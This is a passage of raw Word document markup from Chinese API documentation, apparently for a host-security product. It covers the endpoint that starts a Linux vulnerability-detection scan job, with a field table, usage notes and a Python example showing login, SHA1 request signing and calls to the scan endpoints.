      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F256D1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>如果有作业在运行返回：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF950D0"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7A9E20F0"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39F3A8F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F628E2D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22F518E9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FC95DD7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B21C79D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="20D66208" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53A56717" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B70BE04" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F365F10" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63E9F12E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>扫描任务ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5B7B8B18" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>场景说明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D940EC8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>这个</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>调用前需要先调用4.5.2查询风险扫描执行状态接口，如果该接口返回状态非Running， 则可以调用该漏洞检测扫描接口创建漏洞检测扫描job。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2407DA30" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>异常说明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4A1A82" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>如果任务创建失败， 抛出异常。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E7DA79" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>代码示例(python)：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B5275A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>#! /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/bin/env python</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># -*- coding: utf-8 -*-</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">from __future__ import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>absolute_import</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:br/>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>httplib</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
        <w:t>import time</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hashlib</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>host = "tests.qingteng.cn"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>port = 80</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># 登录请求调用示例</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>def login():</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    conn = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>httplib.HTTPConnection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = "http://%s:%s/v1/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/auth" % (host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    header = {"Content-Type": "application/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    body = {"username": "dev@qingteng.cn", "password": "abc@123"}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json_body</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json.dumps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(body)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>conn.request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(method="POST", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, body=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json_body</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, headers=header)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    response = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>conn.getresponse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>response.read</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    return </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json.loads</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(res)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># 发送请求</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>send_request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(method, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, data):</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    # 参看登录认证里面的登录方法代码示例</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>login_result</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = login()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sign_key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>login_result.get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>("data").get("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>signKey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>")</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jwt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>login_result.get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>("data").get("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jwt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>")</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>comid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>login_result.get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>("data").get("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>comId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>")</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    # 当前时间戳</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = int(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>time.time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>())</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    if data is not None:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        info = ""</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        if method == "GET":</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            # 对参数key进行字典排序</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            keys = sorted(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>data.keys</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>())</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            for key in keys:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                info = info + key + str(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>data.get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(key))</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                print info</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elif</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> method == "POST" or method == "PUT" or method == "DELETE":</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            info = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json.dumps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        # 拼接待签名字符串</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>to_sign</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>comid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> + info + str(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sign_key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    else:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        # 拼接待签名字符串</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>to_sign</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>comid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> + str(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sign_key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    print </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>to_sign</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    # 对待签名字符串进行sha1得到签名字符串</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    sign = hashlib.sha1(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>to_sign</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>).</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hexdigest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    # 组装http请求头参数</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    header = {"Content-Type": "application/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>comId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">": </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>comid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, "timestamp": </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">              "sign": sign, "Authorization": "Bearer " + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jwt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    conn = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>httplib.HTTPConnection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>conn.request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(method=method, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, body=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json.dumps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(data), headers=header)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    response = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>conn.getresponse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>response.read</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    return res</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>启动漏洞扫描的代码示例(python)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>start_poc_check</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>():</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = "http://%s:%s/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>poc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/check" % (</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    data = {}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>send_request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">("POST", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    print "result: ", res</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>漏洞检测，检查运行应用</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>check_app_running</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>():</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = "http://%s:%s/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>poc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>check_app_running</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" % (</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    data = {"vulId":"QT042017002027"}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>send_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">"POST", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    print "result: ", res</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>if __name__ == '__main__':</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>start_poc_check</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>check_app_running</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB387E6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="221" w:name="_Toc115166185"/>
      <w:bookmarkStart w:id="222" w:name="查询漏洞检测扫描执行状态"/>
      <w:bookmarkEnd w:id="220"/>
      <w:r>
        <w:t>查询漏洞检测扫描执行状态</w:t>
      </w:r>
      <w:bookmarkEnd w:id="221"/>
    </w:p>
    <w:p w14:paraId="48718B73" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
